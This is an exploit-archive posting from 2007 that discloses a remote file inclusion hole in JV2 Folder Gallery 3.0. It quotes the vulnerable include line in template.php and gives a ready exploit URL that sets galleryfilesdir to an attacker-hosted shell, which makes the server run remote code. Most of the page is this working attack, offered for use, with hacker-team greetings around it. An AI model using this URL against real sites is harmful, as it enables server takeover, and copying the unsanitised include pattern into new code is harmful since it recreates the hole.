JV2 Folder Gallery <= 3.0 Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : JV2 Folder Gallery <= 3.0 Remote File Include Vulnerability
# Published : 2007-01-31
# Author : ThE dE@Th
# Previous Title : Extcalendar <= 2 (profile.php) Remote User Pass Change Exploit
# Next Title : Hunkaray Duyuru Scripti (tr) Remote SQL Injection Exploit

*******************************************************************************
Greatz to:AsB-MaY TeAm & HaCk.eGy & To0oFa
ScRiPt:-http://foldergallery.jv2.net/download.php?file=foldergallery_3.0.2
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs TeAm}>>
********************************************************************************
template.php:-
<?php include $galleryfilesdir."/gallery_footer.php"; ?>
********************************************************************************
ExPlOiT:

http://www.Site.com/[JV2 Folder Gallery]/gallery/theme/include_mode/template.php?galleryfilesdir=[Shell]

********************************************************************************

# www.Syue.com [2007-01-31]